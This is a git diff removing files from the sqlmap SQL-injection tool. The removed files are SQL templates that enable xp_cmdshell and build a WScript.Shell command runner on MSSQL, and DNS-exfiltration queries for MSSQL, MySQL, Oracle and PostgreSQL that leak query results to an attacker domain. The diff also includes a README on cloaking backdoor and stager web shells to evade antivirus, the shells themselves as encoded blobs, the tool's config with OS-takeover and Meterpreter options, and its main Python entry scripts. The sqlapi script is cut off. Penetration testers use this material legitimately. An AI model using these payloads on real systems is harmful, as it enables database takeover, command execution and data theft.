index 349c8cf8..00000000 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ /dev/null @@ -1,6 +0,0 @@ -EXEC master..sp_configure 'show advanced options',1; -RECONFIGURE WITH OVERRIDE; -EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; -RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; -RECONFIGURE WITH OVERRIDE diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql deleted file mode 100644 index 00573086..00000000 --- a/procs/mssqlserver/create_new_xp_cmdshell.sql +++ /dev/null @@ -1,3 +0,0 @@ -DECLARE @%RANDSTR% nvarchar(999); -set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; -EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/procs/mssqlserver/disable_xp_cmdshell_2000.sql deleted file mode 100644 index 379f6517..00000000 --- a/procs/mssqlserver/disable_xp_cmdshell_2000.sql +++ /dev/null @@ -1 +0,0 @@ -EXEC master..sp_dropextendedproc 'xp_cmdshell' diff --git a/procs/mssqlserver/dns_request.sql b/procs/mssqlserver/dns_request.sql deleted file mode 100644 index a269c7e1..00000000 --- a/procs/mssqlserver/dns_request.sql +++ /dev/null @@ -1,4 +0,0 @@ -DECLARE @host varchar(1024); -SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; -EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') -# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/procs/mssqlserver/enable_xp_cmdshell_2000.sql deleted file mode 100644 index 2ec15522..00000000 --- a/procs/mssqlserver/enable_xp_cmdshell_2000.sql +++ /dev/null @@ -1 +0,0 @@ -EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' diff --git a/procs/mssqlserver/run_statement_as_user.sql b/procs/mssqlserver/run_statement_as_user.sql deleted file mode 100644 index 575c22ef..00000000 --- a/procs/mssqlserver/run_statement_as_user.sql +++ /dev/null @@ -1,3 +0,0 @@ -SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') -# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') -# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') diff --git a/procs/mysql/dns_request.sql b/procs/mysql/dns_request.sql deleted file mode 100644 index e32fc478..00000000 --- a/procs/mysql/dns_request.sql +++ /dev/null @@ -1 +0,0 @@ -SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) diff --git a/procs/mysql/write_file_limit.sql b/procs/mysql/write_file_limit.sql deleted file mode 100644 index 58fccab0..00000000 --- a/procs/mysql/write_file_limit.sql +++ /dev/null @@ -1 +0,0 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- diff --git a/procs/oracle/dns_request.sql b/procs/oracle/dns_request.sql deleted file mode 100644 index adb71cfb..00000000 --- a/procs/oracle/dns_request.sql +++ /dev/null @@ -1,2 +0,0 @@ -SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL -# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql deleted file mode 100644 index 6724af22..00000000 --- a/procs/postgresql/dns_request.sql +++ /dev/null @@ -1,14 +0,0 @@ -DROP TABLE IF EXISTS %RANDSTR1%; -# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required -CREATE TABLE %RANDSTR1%(%RANDSTR2% text); -CREATE OR REPLACE FUNCTION %RANDSTR3%() -RETURNS VOID AS $$ -DECLARE %RANDSTR4% TEXT; -DECLARE %RANDSTR5% TEXT; -BEGIN -SELECT INTO %RANDSTR5% (%QUERY%); -%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\''; -EXECUTE %RANDSTR4%; -END; -$$ LANGUAGE plpgsql SECURITY DEFINER; -SELECT %RANDSTR3%(); \ No newline at end of file diff --git a/shell/README.txt b/shell/README.txt deleted file mode 100644 index 6e2e08cf..00000000 --- a/shell/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of shell scripts stored inside -this folder, we needed to somehow circumvent this. As from the plain -sqlmap users perspective nothing has to be done prior to their usage by -sqlmap, but if you want to have access to their original source code use -the decrypt functionality of the ../extra/cloak/cloak.py utility. - -To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; - -To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ deleted file mode 100644 index d126faee..00000000 --- a/shell/backdoor.asp_ +++ /dev/null @@ -1,2 +0,0 @@ -œ…ŽË1ÃOo:÷þŠ‘¥+ÍÆý~lv-\SÒkÙ>é}©UÉ´¤5“Dwþa›†×}±óîF ;KEè -šÁÁzKP'çýÄÊÍ©,Zïu¦;–ÑøX’ã¿+QŠ ­@¹ë¦:ýÿ¢ÎÚ¦D°Vèð Þ~©1µxrAØá·`ÝO†a”m¹‡7ñÄ0Nk0Øn€¯Ä+›‰(¬À+²¸¼ÊÄ VÕƒºÏÓÕ TI£koC³ð¦N³®ömæ»Ö»¶Z¢«>î6”oÂxƒvAQ0`(‡¾³È5ÓGœºdø]wÈDù \ No newline at end of file diff --git a/shell/backdoor.aspx_ b/shell/backdoor.aspx_ deleted file mode 100644 index af7f6d58..00000000 Binary files a/shell/backdoor.aspx_ and /dev/null differ diff --git a/shell/backdoor.jsp_ b/shell/backdoor.jsp_ deleted file mode 100644 index ef32603b..00000000 Binary files a/shell/backdoor.jsp_ and /dev/null differ diff --git a/shell/backdoor.php_ b/shell/backdoor.php_ deleted file mode 100644 index 172dd5f2..00000000 Binary files a/shell/backdoor.php_ and /dev/null differ diff --git a/shell/runcmd.exe_ b/shell/runcmd.exe_ deleted file mode 100644 index 5e0d05a9..00000000 Binary files a/shell/runcmd.exe_ and /dev/null differ diff --git a/shell/stager.asp_ b/shell/stager.asp_ deleted file mode 100644 index 75a64c1f..00000000 Binary files a/shell/stager.asp_ and /dev/null differ diff --git a/shell/stager.aspx_ b/shell/stager.aspx_ deleted file mode 100644 index 54d56503..00000000 Binary files a/shell/stager.aspx_ and /dev/null differ diff --git a/shell/stager.jsp_ b/shell/stager.jsp_ deleted file mode 100644 index 0aa08860..00000000 Binary files a/shell/stager.jsp_ and /dev/null differ diff --git a/shell/stager.php_ b/shell/stager.php_ deleted file mode 100644 index 64f8eaca..00000000 Binary files a/shell/stager.php_ and /dev/null differ diff --git a/sqlmap.conf b/sqlmap.conf deleted file mode 100644 index fb0e0018..00000000 --- a/sqlmap.conf +++ /dev/null @@ -1,790 +0,0 @@ -# At least one of these options has to be specified to set the source to -# get target URLs from. -[Target] - -# Direct connection to the database. -# Examples: -# mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME -# oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID -direct = - -# Target URL. -# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 -url = - -# Parse targets from Burp or WebScarab logs -# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path -# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) -# 'conversations/' folder path -logFile = - -# Scan multiple targets enlisted in a given textual file -bulkFile = - -# Load HTTP request from a file -# Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme -requestFile = - -# Rather than providing a target URL, let Google return target -# hosts as result of your Google dork expression. For a list of Google -# dorks see Johnny Long Google Hacking Database at -# http://johnny.ihackstuff.com/ghdb.php. -# Example: +ext:php +inurl:"&id=" +intext:"powered by " -googleDork = - -# Parse target(s) from remote sitemap(.xml) file. -# Example: http://192.168.1.121/sitemap.xml -sitemapUrl = - - -# These options can be used to specify how to connect to the target URL. -[Request] - -# Force usage of given HTTP method (e.g. PUT). -method = - -# Data string to be sent through POST. -data = - -# Character used for splitting parameter values. -paramDel = - -# HTTP Cookie header value. -cookie = - -# Character used for splitting cookie values. -cookieDel = - -# File containing cookies in Netscape/wget format. -loadCookies = - -# Ignore Set-Cookie header from response. -# Valid: True or False -dropSetCookie = False - -# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value -# at each HTTP request. -# sqlmap will also test for SQL injection on the HTTP User-Agent value. -agent = - -# Use randomly selected HTTP User-Agent header value. -# Valid: True or False -randomAgent = False - -# HTTP Host header value. -host = - -# HTTP Referer header. Useful to fake the HTTP Referer header value at -# each HTTP request. -referer = - -# Extra HTTP headers -headers = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 - -# HTTP Authentication type. Useful only if the target URL requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Valid: Basic, Digest, NTLM or PKI -authType = - -# HTTP authentication credentials. Useful only if the target URL requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Syntax: username:password -authCred = - -# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires -# PKI authentication and you have such data. -# Syntax: key_file -authFile = - -# Use a proxy to connect to the target URL. -# Syntax: (http|https|socks4|socks5)://address:port -proxy = - -# Proxy authentication credentials. Useful only if the proxy requires -# Basic or Digest authentication and you have such data. -# Syntax: username:password -proxyCred = - -# Load proxy list from a file -proxyFile = - -# Ignore system default proxy settings. -# Valid: True or False -ignoreProxy = False - -# Use Tor anonymity network. -# Valid: True or False -tor = False - -# Set Tor proxy port other than default. -# Valid: integer -# torPort = - -# Set Tor proxy type. -# Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP - -# Check to see if Tor is used properly. -# Valid: True or False -checkTor = False - -# Delay in seconds between each HTTP request. -# Valid: float -# Default: 0 -delay = 0 - -# Seconds to wait before timeout connection. -# Valid: float -# Default: 30 -timeout = 30 - -# Maximum number of retries when the HTTP connection timeouts. -# Valid: integer -# Default: 3 -retries = 3 - -# Randomly change value for the given parameter. -rParam = - -# URL address to visit frequently during testing. -# Example: http://192.168.1.121/index.html -safeUrl = - -# POST data to send to a safe URL. -# Example: username=admin&password=passw0rd! -safePost = - -# Load safe HTTP request from a file. -safeReqFile = - -# Test requests between two visits to a given safe URL (default 0). -# Valid: integer -# Default: 0 -safeFreq = 0 - -# Skip URL encoding of payload data -# Valid: True or False -skipUrlEncode = False - -# Parameter used to hold anti-CSRF token -csrfToken = - -# URL address to visit to extract anti-CSRF token -csrfUrl = - -# Force usage of SSL/HTTPS -# Valid: True or False -forceSSL = False - -# Use HTTP parameter pollution. -# Valid: True or False -hpp = False - -# Evaluate provided Python code before the request. -# Example: import hashlib;id2=hashlib.md5(id).hexdigest() -evalCode = - -# These options can be used to optimize the performance of sqlmap. -[Optimization] - -# Use all optimization options. -# Valid: True or False -optimize = False - -# Predict common queries output. -# Valid: True or False -predictOutput = False - -# Use persistent HTTP(s) connections. -keepAlive = False - -# Retrieve page length without actual HTTP response body. -# Valid: True or False -nullConnection = False - -# Maximum number of concurrent HTTP(s) requests (handled with Python threads) -# to be used in the inference SQL injection attack. -# Valid: integer -# Default: 1 -threads = 1 - - -# These options can be used to specify which parameters to test for, -# provide custom injection payloads and optional tampering scripts. -[Injection] - -# Testable parameter(s) comma separated. By default all GET/POST/Cookie -# parameters and HTTP User-Agent are tested by sqlmap. -testParameter = - -# Skip testing for given parameter(s). -skip = - -# Skip testing parameters that not appear dynamic. -# Valid: True or False -skipStatic = False - -# Force back-end DBMS to this value. If this option is set, the back-end -# DBMS identification process will be minimized as needed. -# If not set, sqlmap will detect back-end DBMS automatically by default. -# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, -# access, firebird, maxdb, sybase -dbms = - -# DBMS authentication credentials (user:password). Useful if you want to -# run SQL statements as another user, the back-end database management -# system is PostgreSQL or Microsoft SQL Server and the parameter is -# vulnerable by stacked queries SQL injection or you are connecting directly -# to the DBMS (-d switch). -# Syntax: username:password -dbmsCred = - -# Force back-end DBMS operating system to this value. If this option is -# set, the back-end DBMS identification process will be minimized as -# needed. -# If not set, sqlmap will detect back-end DBMS operating system -# automatically by default. -# Valid: linux, windows -os = - -# Use big numbers for invalidating values. -# Valid: True or False -invalidBignum = False - -# Use logical operations for invalidating values. -# Valid: True or False -invalidLogical = False - -# Use random strings for invalidating values. -# Valid: True or False -invalidString = False - -# Turn off payload casting mechanism -# Valid: True or False -noCast = False - -# Turn off string escaping mechanism -# Valid: True or False -noEscape = False - -# Injection payload prefix string. -prefix = - -# Injection payload suffix string. -suffix = - -# Use given script(s) for tampering injection data. -tamper = - - -# These options can be used to specify how to parse and compare page -# content from HTTP responses when using blind SQL injection technique. -[Detection] - -# Level of tests to perform. -# The higher the value is, the higher the number of HTTP(s) requests are -# as well as the better chances to detect a tricky SQL injection. -# Valid: Integer between 1 and 5 -# Default: 1 -level = 1 - -# Risk of tests to perform. -# Note: boolean-based blind SQL injection tests with AND are considered -# risk 1, with OR are considered risk 3. -# Valid: Integer between 1 and 3 -# Default: 1 -risk = 1 - -# String to match within the raw response when the query is evaluated to -# True, only needed if the page content dynamically changes at each refresh. -# Refer to the user's manual for further details. -string = - -# String to match within the raw response when the query is evaluated to -# False, only needed if the page content dynamically changes at each refresh. -# Refer to the user's manual for further details. -notString = - -# Regular expression to match within the raw response when the query is -# evaluated to True, only needed if the needed if the page content -# dynamically changes at each refresh. -# Refer to the user's manual for further details. -# Valid: regular expression with Python syntax -# (http://www.python.org/doc/2.5.2/lib/re-syntax.html) -regexp = - -# HTTP response code to match when the query is True. -# Valid: Integer -# Example: 200 (assuming any False statement returns a different response -# code) -# code = - -# Compare pages based only on the textual content. -# Valid: True or False -textOnly = False - -# Compare pages based only on their titles. -# Valid: True or False -titles = False - - -# These options can be used to tweak testing of specific SQL injection -# techniques. -[Techniques] - -# SQL injection techniques to use. -# Valid: a string composed by B, E, U, S, T and Q where: -# B: Boolean-based blind SQL injection -# E: Error-based SQL injection -# U: UNION query SQL injection -# S: Stacked queries SQL injection -# T: Time-based blind SQL injection -# Q: Inline SQL injection -# Example: ES (means test for error-based and stacked queries SQL -# injection types only) -# Default: BEUSTQ (means test for all SQL injection types - recommended) -tech = BEUSTQ - -# Seconds to delay the response from the DBMS. -# Valid: integer -# Default: 5 -timeSec = 5 - -# Range of columns to test for -# Valid: range of integers -# Example: 1-10 -uCols = - -# Character to use for bruteforcing number of columns -# Valid: string -# Example: NULL -uChar = - -# Table to use in FROM part of UNION query SQL injection -# Valid: string -# Example: INFORMATION_SCHEMA.COLLATIONS -uFrom = - -# Domain name used for DNS exfiltration attack -# Valid: string -dnsName = - -# Resulting page URL searched for second-order response -# Valid: string -secondOrder = - - -[Fingerprint] - -# Perform an extensive back-end database management system fingerprint -# based on various techniques. -# Valid: True or False -extensiveFp = False - - -# These options can be used to enumerate the back-end database -# management system information, structure and data contained in the -# tables. Moreover you can run your own SQL statements. -[Enumeration] - -# Retrieve everything -# Valid: True or False -getAll = False - -# Retrieve back-end database management system banner. -# Valid: True or False -getBanner = False - -# Retrieve back-end database management system current user. -# Valid: True or False -getCurrentUser = False - -# Retrieve back-end database management system current database. -# Valid: True or False -getCurrentDb = False - -# Retrieve back-end database management system server hostname. -# Valid: True or False -getHostname = False - -# Detect if the DBMS current user is DBA. -# Valid: True or False -isDba = False - -# Enumerate back-end database management system users. -# Valid: True or False -getUsers = False - -# Enumerate back-end database management system users password hashes. -# Valid: True or False -getPasswordHashes = False - -# Enumerate back-end database management system users privileges. -# Valid: True or False -getPrivileges = False - -# Enumerate back-end database management system users roles. -# Valid: True or False -getRoles = False - -# Enumerate back-end database management system databases. -# Valid: True or False -getDbs = False - -# Enumerate back-end database management system database tables. -# Optional: db -# Valid: True or False -getTables = False - -# Enumerate back-end database management system database table columns. -# Optional: db, tbl, col -# Valid: True or False -getColumns = False - -# Enumerate back-end database management system schema. -# Valid: True or False -getSchema = False - -# Retrieve number of entries for table(s). -# Valid: True or False -getCount = False - -# Dump back-end database management system database table entries. -# Requires: tbl and/or col -# Optional: db -# Valid: True or False -dumpTable = False - -# Dump all back-end database management system databases tables entries. -# Valid: True or False -dumpAll = False - -# Search column(s), table(s) and/or database name(s). -# Requires: db, tbl or col -# Valid: True or False -search = False - -# Retrieve back-end database management system comments. -# Valid: True or False -getComments = False - -# Back-end database management system database to enumerate. -db = - -# Back-end database management system database table(s) to enumerate. -tbl = - -# Back-end database management system database table column(s) to enumerate. -col = - -# Back-end database management system database table column(s) to not enumerate. -excludeCol = - -# Use WHERE condition while table dumping (e.g. "id=1"). -dumpWhere = - -# Back-end database management system database user to enumerate. -user = - -# Exclude DBMS system databases when enumerating tables. -# Valid: True or False -excludeSysDbs = False - -# First query output entry to retrieve -# Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) -limitStart = 0 - -# Last query output entry to retrieve -# Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and -# retrieve them until the last) -limitStop = 0 - -# First query output word character to retrieve -# Valid: integer -# Default: 0 (sqlmap will enumerate the query output from the first -# character) -firstChar = 0 - -# Last query output word character to retrieve -# Valid: integer -# Default: 0 (sqlmap will enumerate the query output until the last -# character) -lastChar = 0 - -# SQL statement to be executed. -# Example: SELECT 'foo', 'bar' -query = - -# Prompt for an interactive SQL shell. -# Valid: True or False -sqlShell = False - -# Execute SQL statements from given file(s). -sqlFile = - - -# These options can be used to run brute force checks. -[Brute force] - -# Check existence of common tables. -# Valid: True or False -commonTables = False - -# Check existence of common columns. -# Valid: True or False -commonColumns = False - - -# These options can be used to create custom user-defined functions. -[User-defined function] - -# Inject custom user-defined functions -# Valid: True or False -udfInject = False - -# Local path of the shared library -shLib = - - -# These options can be used to access the back-end database management -# system underlying file system. -[File system] - -# Read a specific file from the back-end DBMS underlying file system. -# Examples: /etc/passwd or C:\boot.ini -rFile = - -# Write a local file to a specific path on the back-end DBMS underlying -# file system. -# Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = - -# Back-end DBMS absolute filepath to write the file to. -dFile = - - -# These options can be used to access the back-end database management -# system underlying operating system. -[Takeover] - -# Execute an operating system command. -# Valid: operating system command -osCmd = - -# Prompt for an interactive operating system shell. -# Valid: True or False -osShell = False - -# Prompt for an out-of-band shell, Meterpreter or VNC. -# Valid: True or False -osPwn = False - -# One click prompt for an out-of-band shell, Meterpreter or VNC. -# Valid: True or False -osSmb = False - -# Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored -# procedure heap-based buffer overflow (MS09-004) exploitation. -# Valid: True or False -osBof = False - -# Database process' user privilege escalation. -# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the -# payload to be Meterpreter. -privEsc = False - -# Local path where Metasploit Framework is installed. -# Valid: file system path -msfPath = - -# Remote absolute path of temporary files directory. -# Valid: absolute file system path -tmpPath = - - -# These options can be used to access the back-end database management -# system Windows registry. -[Windows] - -# Read a Windows registry key value. -# Valid: True or False -regRead = False - -# Write a Windows registry key value data. -# Valid: True or False -regAdd = False - -# Delete a Windows registry key value. -# Valid: True or False -regDel = False - -# Windows registry key. -regKey = - -# Windows registry key value. -regVal = - -# Windows registry key value data. -regData = - -# Windows registry key value type. -regType = - - -# These options can be used to set some general working parameters. -[General] - -# Load session from a stored (.sqlite) file -# Example: output/www.target.com/session.sqlite -sessionFile = - -# Log all HTTP traffic into a textual file. -trafficFile = - -# Never ask for user input, use the default behaviour. -# Valid: True or False -batch = False - -# Force character encoding used for data retrieval. -charset = - -# Crawl the website starting from the target URL. -# Valid: integer -# Default: 0 -crawlDepth = 0 - -# Regexp to exclude pages from crawling (e.g. "logout"). -crawlExclude = - -# Delimiting character used in CSV output. -# Default: , -csvDel = , - -# Format of dumped data -# Valid: CSV, HTML or SQLITE -dumpFormat = CSV - -# Retrieve each query output length and calculate the estimated time of -# arrival in real time. -# Valid: True or False -eta = False - -# Flush session files for current target. -# Valid: True or False -flushSession = False - -# Parse and test forms on target URL. -# Valid: True or False -forms = False - -# Ignore query results stored in session file. -# Valid: True or False -freshQueries = False - -# Use DBMS hex function(s) for data retrieval. -# Valid: True or False -hexConvert = False - -# Custom output directory path. -outputDir = - -# Parse and display DBMS error messages from responses. -# Valid: True or False -parseErrors = False - -# Pivot column name. -pivotColumn = - -# Regular expression for filtering targets from provided Burp. -# or WebScarab proxy log. -# Example: (google|yahoo) -scope = - -# Select tests by payloads and/or titles (e.g. ROW) -testFilter = - -# Skip tests by payloads and/or titles (e.g. BENCHMARK) -testSkip = - -# Update sqlmap. -# Valid: True or False -updateAll = False - - -[Miscellaneous] - -# Run host OS command(s) when SQL injection is found. -alert = - -# Set question answers (e.g. "quit=N,follow=N"). -answers = - -# Beep on question and/or when SQL injection is found. -# Valid: True or False -beep = False - -# Offline WAF/IPS/IDS payload detection testing. -# Valid: True or False -checkPayload = False - -# Clean up the DBMS from sqlmap specific UDF and tables. -# Valid: True or False -cleanup = False - -# Check for missing (non-core) sqlmap dependencies. -# Valid: True or False -dependencies = False - -# Disable console output coloring. -# Valid: True or False -disableColoring = False - -# Use Google dork results from specified page number. -# Valid: integer -# Default: 1 -googlePage = 1 - -# Make a thorough testing for a WAF/IPS/IDS protection. -# Valid: True or False -identifyWaf = False - -# Skip heuristic detection of WAF/IPS/IDS protection. -# Valid: True or False -skipWaf = False - -# Imitate smartphone through HTTP User-Agent header. -# Valid: True or False -mobile = False - -# Work in offline mode (only use session data) -# Valid: True or False -offline = False - -# Display page rank (PR) for Google dork results. -# Valid: True or False -pageRank = False - -# Conduct thorough tests only if positive heuristic(s). -# Valid: True or False -smart = False - -# Simple wizard interface for beginner users. -# Valid: True or False -wizard = False - -# Verbosity level. -# Valid: integer between 0 and 6 -# 0: Show only error and critical messages -# 1: Show also warning and info messages -# 2: Show also debug messages -# 3: Show also payloads injected -# 4: Show also HTTP requests -# 5: Show also HTTP responses' headers -# 6: Show also HTTP responses' page content -# Default: 1 -verbose = 1 diff --git a/sqlmap.py b/sqlmap.py deleted file mode 100755 index 82aa64df..00000000 --- a/sqlmap.py +++ /dev/null @@ -1,252 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -sys.dont_write_bytecode = True - -from lib.utils import versioncheck # this has to be the first non-standard import - -import bdb -import inspect -import logging -import os -import re -import shutil -import sys -import thread -import time -import traceback -import warnings - -warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) -warnings.filterwarnings(action="ignore", category=DeprecationWarning) - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import createGithubIssue -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import maskSensitiveData -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import initOptions -from lib.core.option import init -from lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import setRestAPILog -from lib.utils.api import StdDbOut - -def modulePath(): - """ - This will get us the program's directory, even if we are frozen - using py2exe - """ - - try: - _ = sys.executable if weAreFrozen() else __file__ - except NameError: - _ = inspect.getsourcefile(modulePath) - - return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding()) - -def main(): - """ - Main function of sqlmap when running from command line. - """ - - try: - paths.SQLMAP_ROOT_PATH = modulePath() - - try: - os.path.isdir(paths.SQLMAP_ROOT_PATH) - except UnicodeEncodeError: - errMsg = "your system does not properly handle non-ASCII paths. " - errMsg += "Please move the sqlmap's directory to the other location" - logger.error(errMsg) - raise SystemExit - - setPaths() - - # Store original command line options for possible later restoration - cmdLineOptions.update(cmdLineParser().__dict__) - initOptions(cmdLineOptions) - - if hasattr(conf, "api"): - # Overwrite system standard output and standard error to write - # to an IPC database - sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") - sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") - setRestAPILog() - - banner() - - conf.showTime = True - dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) - - init() - - if conf.profile: - profile() - elif conf.smokeTest: - smokeTest() - elif conf.liveTest: - liveTest() - else: - try: - start() - except thread.error as ex: - if "can't start new thread" in getSafeExString(ex): - errMsg = "unable to start new threads. Please check OS (u)limits" - logger.critical(errMsg) - raise SystemExit - else: - raise - - except SqlmapUserQuitException: - errMsg = "user quit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except (SqlmapSilentQuitException, bdb.BdbQuit): - pass - - except SqlmapShellQuitException: - cmdLineOptions.sqlmapShell = False - - except SqlmapBaseException as ex: - errMsg = getSafeExString(ex) - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass - raise SystemExit - - except KeyboardInterrupt: - print - - errMsg = "user aborted" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except EOFError: - print - errMsg = "exit" - - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass - - except SystemExit: - pass - - except: - print - errMsg = unhandledExceptionMessage() - excMsg = traceback.format_exc() - - try: - if any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): - errMsg = "no space left on output device" - logger.error(errMsg) - raise SystemExit - - elif "_mkstemp_inner" in excMsg: - errMsg = "there has been a problem while accessing temporary files" - logger.error(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("pymysql", "configparser")): - errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" - logger.error(errMsg) - raise SystemExit - - elif "bad marshal data (unknown type code)" in excMsg: - match = re.search(r"\s*(.+)\s+ValueError", excMsg) - errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") - errMsg += ". Please delete .pyc files on your system to fix the problem" - logger.error(errMsg) - raise SystemExit - - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') - excMsg = excMsg.replace(match.group(1), file_) - - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) - - if hasattr(conf, "api"): - logger.critical("%s\n%s" % (errMsg, excMsg)) - else: - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) - - except KeyboardInterrupt: - pass - - finally: - kb.threadContinue = False - kb.threadException = True - - if conf.get("showTime"): - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - - if kb.get("tempDir"): - shutil.rmtree(kb.tempDir, ignore_errors=True) - - if conf.get("hashDB"): - try: - conf.hashDB.flush(True) - except KeyboardInterrupt: - pass - - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - main() - - if hasattr(conf, "api"): - try: - conf.database_cursor.disconnect() - except KeyboardInterrupt: - pass - - if conf.get("dumper"): - conf.dumper.flush() - - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) - -if __name__ == "__main__": - main() diff --git a/sqlmapapi.py b/sqlmapapi.py deleted file mode 100755 index 7aa369f5..00000000 --- a/sqlmapapi.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import optparse -import sys - -sys.dont_write_bytecode = True - -from lib.utils import versioncheck # this has to be the first non-standard import - -from sqlmap import modulePath -from lib.core.common import setPaths -from lib.core.data import paths -from lib.core.data import logger -from lib.core.settings import RESTAPI_DEFAULT_ADAPTER -from lib.core.settings import RESTAPI_DEFAULT_ADDRESS -from lib.core.settings import RESTAPI_DEFAULT_PORT -from lib.utils.api import client -from lib.utils.api import server - -def main(): - """ - REST-JSON API main function - """ - - 